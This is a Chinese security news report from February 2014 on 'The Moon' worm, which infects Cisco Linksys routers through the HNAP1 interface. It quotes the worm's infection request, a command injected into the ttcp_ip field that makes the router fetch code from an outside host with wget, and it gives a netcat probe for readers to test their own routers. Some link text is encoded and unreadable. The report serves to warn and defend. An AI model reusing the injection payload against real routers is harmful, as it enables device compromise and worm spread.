新闻链接：b03K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3k6J5k6h3g2T1N6h3k6Q4x3X3g2U0L8$3#2Q4x3V1k6F1k6i4N6K6i4K6u0r3x3U0f1&6y4e0N6Q4x3X3g2Z5N6r3#2D9
  新闻时间：2014-02-15 
  新闻正文： 作为互联网的入口，家用路由器越来越被业界所重视。路由器更加智能了，路由器的安全也会更加多样化。近日，国外安全研究者发布Linksys路由器蠕虫预警。根据路由器的固件版本，Cisco Linksys E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000,E900等型号存在被蠕虫感染的风险。  

这个蠕虫首先连接路由器的8080端口，请求“/HNAP1/”这个路径。linksys路由器会返回一个包含路由器特性和固件版本的xml文档。
<ModelName>E2500</ModelName>
<FirmwareVersion>1.0.07 build 1</FirmwareVersion>
这是E2500型号返回的固件相关信息。之后，蠕虫会发送一个特定的请求到存在漏洞的路由器，这个请求会导致路由器执行一段shell脚本，从而感染蠕虫。第二次的请求如下：
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
`cd /tmp;if [ ! -e .L26 ];then wget 1fbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9#2b7Y4y4G2N6i4u0U0k6g2)9J5y4X3&6T1M7%4m8Q4x3@1u0u0f1q4)9#2c8q4)9K6b7e0p5&6x3#2)9J5c8U0m8d9P5q4)9J5k6h3#2A6k6q4)9K6b7X3k6A6i4K6j5H3
&StartEPI=1
一旦被蠕虫感染，路由器就会扫描其他的ip，这个蠕虫内置了大约670个不同国家的家用网段。而且被感染的路由器在短时间内会作为http服务器供其他被感染的路由器下载蠕虫代码。目前尚不清楚这个蠕虫网络是否存在命令和控制频道。当前它的行为仅仅是传播。研究者在蠕虫的文件中发现了电影《The Moon》的相关图片，所以被命名为The Moon。
可以通过以下命令来检测自己的路由器是否存在漏洞：
echo "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080
如果或得了xml格式的返回数据，那么你的路由器很可能存在漏洞，有被蠕虫感染的风险。

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课